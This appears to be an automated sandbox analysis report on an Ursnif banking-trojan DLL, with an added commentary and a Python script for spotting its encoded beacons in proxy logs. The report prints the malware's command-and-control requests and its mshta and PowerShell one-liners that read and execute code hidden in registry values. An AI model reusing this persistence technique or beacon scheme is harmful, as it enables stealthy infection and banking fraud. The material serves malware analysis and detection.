              Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: rundll32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wtsapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: iphlpapi.pdb' source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc_os.pdbS source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbbj source: WerFault.exe, 00000014.00000003.412073889.0000000004DB5000.00000004.00000001.sdmp
              Source: Binary string: netutils.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 00000014.00000003.411494273.0000000004E04000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E188626 FindFirstFileExA
Source: Joe Sandbox View, ASN Name: DIGITALOCEAN-ASNUS
Source: global traffic, HTTP traffic detected:
    GET /4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/xP63sFYeQbF7V/py7Hi7cb/9YfAdWQtdGthxteTogc4W5n/e4pHdJmwQV/Xb_2ByBc4q7LehmCP/qbPYu2dVkV6R/HcylsChDiT2/MxSzZGJm_2F7kQ/SwyqdbxYkDgH_2FqkftiZ/sgfsFtj_2BtQQ2R6/R1qw5igRxvImwz6/pMeyM_2FrLNrloESyl/5_2BeunOI/9zlfRQun7lnhbsKL_2FH/F_2B8nMOma_2F2fjvu5/bI8nw1gkOTg_2F0CTqoQIr/cSQsg2LKmpe1I/kDimvPNH/SgPLk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/uvvfHn2PMXNEy/YMBxD3SD/aXgaxQm1VvX_2F13h2xPwK_/2Be7i5l50E/A7ENFq4ZupT65ephY/chqySvAke9ce/Kevf8ZZImEj/1Va42IfLQ3XJd9/R1lLLjkYwIWCsGvDlqysG/bJCIxC_2Ba_2FKBG/1sCib9KWGT9006o/pVIAR6x7f8e8pX6JMX/r5dwKRidW/K11bWM2mJHwpxkeOpFZf/WuqCfL3c8woO2jHlv7x/oi4kjIDfCy176FSPyJZhM9/EN_2FkQv43sxx/a HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd/bp1e8aV2PI_2/FY5oP4oo0f6/GeARX2_2FlA_2F/2BhurwBe_2BrsQ1B1bUK7/wilinEmmYIdaZ6lz/71Mw33QzoCtr9s9/ULFilVIFcIxUDJIsEo/crrSiFkaK/6sQSCYti3ETwug18IBlk/b94MQVqQ698rgMibrOo/RMBVkg8AFrK4uT2Dq6pO06/OdceZPFn8QQWz/SARUSfJd/dirYBJB3Uuu4IivFAYs9FmV/Pmcsy6YvBv/Lcgiqf1bUTKnYCeNL/dikDMv66Bty/6H HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gtr.antoinfer.com
    Connection: Keep-Alive
Source: unknown, DNS traffic detected: queries for: gtr.antoinfer.com
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Mon, 12 Jul 2021 09:50:36 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: powershell.exe, 0000002A.00000002.626923996.00000273E0C30000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: {08A52032-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DFBCEA36BA3DC5EC74.TMP.32.dr, String found in binary or memory: http://gtr.antoinfer.com/4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/x
Source: rundll32.exe, 00000003.00000002.610195146.0000000002CD0000.00000002.00000001.sdmp, powershell.exe, 0000002A.00000002.609722055.00000273C7180000.00000002.00000001.sdmp, String found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2
Source: {08A52036-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, String found in binary or memory: http://gtr.antoinfer.com/M70Tzsw1MNAdF/xfm5A_2F/icgFe0hTlDYi8x1LZCDgadb/p8hAogRvpL/JEjshnYytb_2FaVCd
Source: {08A52034-E342-11EB-90E4-ECF4BB862DED}.dat.32.dr, ~DF5A692A62F2D75F35.TMP.32.dr, String found in binary or memory: http://gtr.antoinfer.com/Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/u
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000002A.00000002.610882160.00000273C88F1000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000002A.00000002.612577648.00000273C8AFF000.00000004.00000001.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000002A.00000002.622133874.00000273D895C000.00000004.00000001.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
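The three beacons to gtr.antoinfer.com carry the ISFB/Ursnif request URI: the request parameters are Serpent-encrypted with the serpent_key from the extracted config, base64-encoded, '+' and '/' rewritten as _2B and _2F (URL-encoded %2B / %2F with the '%' swapped for '_'), and slashes inserted at arbitrary positions so the path looks like a deep directory tree. One inserted slash in the second request even splits an escape ("...K_/2Be7..."), which is why the slashes must be removed before the tokens are mapped back. Both full paths reduce to 320 base64 characters, that is 240 bytes, a whole number of 16-byte cipher blocks. The IE11 user-agent and the {GUID}.dat container files the URLs were recovered from are consistent with the beacons leaving through the COM-started iexplore.exe in the process tree. The Python below is an added example, not the report's or Joe Sandbox's code: it undoes the wrapping and uses the block-aligned length as a triage signal over request lines. The two paths are copied from the capture, the request lines and thresholds are constructed by us, and it does not decrypt anything.

```python
import base64
import binascii
import re

# Request paths copied verbatim from the two full beacons in the report.
PATH_1 = ("/4khtvsQ0u/_2Bibxls4V27IXxwFbLo/MVAeZiN_2BcOXrnrV8V/qJdJNxZ6Bgv5NEeycuU5RT/"
          "xP63sFYeQbF7V/py7Hi7cb/9YfAdWQtdGthxteTogc4W5n/e4pHdJmwQV/Xb_2ByBc4q7LehmCP/"
          "qbPYu2dVkV6R/HcylsChDiT2/MxSzZGJm_2F7kQ/SwyqdbxYkDgH_2FqkftiZ/sgfsFtj_2BtQQ2R6/"
          "R1qw5igRxvImwz6/pMeyM_2FrLNrloESyl/5_2BeunOI/9zlfRQun7lnhbsKL_2FH/F_2B8nMOma_2F2fjvu5/"
          "bI8nw1gkOTg_2F0CTqoQIr/cSQsg2LKmpe1I/kDimvPNH/SgPLk")
PATH_2 = ("/Pl9Eori10/TWROVDxUXG0e5P8cvyge/ZU2BrrTT9UbiVqqjDG4/pcVLHkjQ_2FTIEKMeI9p0c/"
          "uvvfHn2PMXNEy/YMBxD3SD/aXgaxQm1VvX_2F13h2xPwK_/2Be7i5l50E/A7ENFq4ZupT65ephY/"
          "chqySvAke9ce/Kevf8ZZImEj/1Va42IfLQ3XJd9/R1lLLjkYwIWCsGvDlqysG/bJCIxC_2Ba_2FKBG/"
          "1sCib9KWGT9006o/pVIAR6x7f8e8pX6JMX/r5dwKRidW/K11bWM2mJHwpxkeOpFZf/WuqCfL3c8woO2jHlv7x/"
          "oi4kjIDfCy176FSPyJZhM9/EN_2FkQv43sxx/a")


def normalize_path(path: str) -> str:
    """Undo the URL-safe wrapping: drop every '/' first (one lands inside an escape,
    '...K_/2Be7...' in PATH_2), then map _2B -> '+' and _2F -> '/'.
    Base64 never contains '_', so the tokens are unambiguous."""
    return path.replace("/", "").replace("_2B", "+").replace("_2F", "/")


def decode_path(path: str) -> bytes:
    """Normalized path -> raw (still encrypted) request blob."""
    b64 = normalize_path(path)
    b64 += "=" * (-len(b64) % 4)          # padding is not carried in the URL
    return base64.b64decode(b64, validate=True)


def looks_like_ursnif_beacon(path: str, block_size: int = 16) -> bool:
    """Structural triage for proxy logs: many slash-separated base64-looking segments,
    at least one escape token, and a decoded length that is a whole number of cipher
    blocks (Serpent, like AES, has a 16-byte block). The content stays opaque."""
    if not re.fullmatch(r"[A-Za-z0-9_/]+", path) or path.count("/") < 8:
        return False
    if "_2B" not in path and "_2F" not in path:
        return False
    try:
        blob = decode_path(path)
    except (binascii.Error, ValueError):
        return False
    return len(blob) >= block_size and len(blob) % block_size == 0


def triage_request_lines(lines):
    """Return the paths of 'GET/POST <path> HTTP/1.x' request lines that pass the check."""
    flagged = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 2 and parts[0] in ("GET", "POST") and looks_like_ursnif_beacon(parts[1]):
            flagged.append(parts[1])
    return flagged


# Constructed request lines: the two beacons from the report plus two benign paths.
REQUEST_LINES = [
    f"GET {PATH_1} HTTP/1.1",
    "GET /favicon.ico HTTP/1.1",
    f"GET {PATH_2} HTTP/1.1",
    "GET /images/logo_2x.png HTTP/1.1",
]

if __name__ == "__main__":
    for p in triage_request_lines(REQUEST_LINES):
        print(len(normalize_path(p)), "b64 chars ->", len(decode_path(p)), "bytes:", p[:40], "...")
```

The equal 240-byte size of both requests is itself a fingerprint (same field layout, same bot), and the normalized base64 is the input you would feed a Serpent-CBC decryptor keyed with B43ovnLWYCtQUCWU to recover the plaintext parameters; that step is deliberately left out here.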

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match, File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match, File source: 3.3.rundll32.exe.4f594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000003.00000003.556259843.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.537141120.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.537104299.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.536940847.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.548180639.0000000004F59000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.537188735.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.537165510.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.537047715.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.536909133.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000003.536969040.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY

              System Summary:

              Writes registry values via WMI
              Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E141B9C GetProcAddress,NtCreateSection,memset
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E141EC7 NtMapViewOfSection
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E142485 NtQueryVirtualMemory
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E167CA0
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E16B840
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E1796BD
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E17CEC0
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E17FF3F
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E175FDD
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E186CF9
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_6E189B9C
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E142264
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E16B840
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E1796BD
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E17CEC0
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E17FF3F
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E175FDD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 42_2_00007FFAEEA1056F
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 6E174A80 appears 67 times
              Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 6E17B4B4 appears 34 times
              Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648
              Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: lj3H69Z3Io.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
              Source: classification engine, Classification label: mal96.troj.evad.winDLL@26/21@3/1
              Source: C:\Program Files\internet explorer\iexplore.exe, File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
              Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3416
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01
              Source: C:\Windows\SysWOW64\WerFault.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A24.tmp
              Source: lj3H69Z3Io.dll, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Program Files\internet explorer\iexplore.exe, File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\SysWOW64\WerFault.exe, File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
              Source: lj3H69Z3Io.dll, Virustotal: Detection: 41%
              Source: lj3H69Z3Io.dll, ReversingLabs: Detection: 31%
              Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll'
              Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
              Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Busysection
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
              Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis
              Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing
              Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould
              Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 648
              Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 656
              Source: unknown, Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17410 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:82950 /prefetch:2
              Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:996 CREDAT:17430 /prefetch:2
              Source: unknown, Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Ff7t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ff7t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
              Source: C:\Windows\System32\mshta.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\rundll32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
              Source: C:\Windows\SysWOW64\rundll32.exe, Automated click: OK
              Source: Window Recorder, Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
              Source: lj3H69Z3Io.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
              Source: lj3H69Z3Io.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: fltLib.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shell32.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: wsspicli.pdb5 source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: propsys.pdb- source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: mpr.pdb source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cryptbase.pdb; source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: Bed.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: setupapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000002.436609525.0000000004DF9000.00000004.00000001.sdmp
              Source: Binary string: winspool.pdb! source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: shcore.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
              Source: Binary string: profapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: winspool.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.418673518.0000000005390000.00000004.00000001.sdmp
              Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: propsys.pdb source: WerFault.exe, 00000014.00000003.418704958.0000000005376000.00000004.00000040.sdmp
              Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000014.00000003.418696334.0000000005370000.00000004.00000040.sdmp
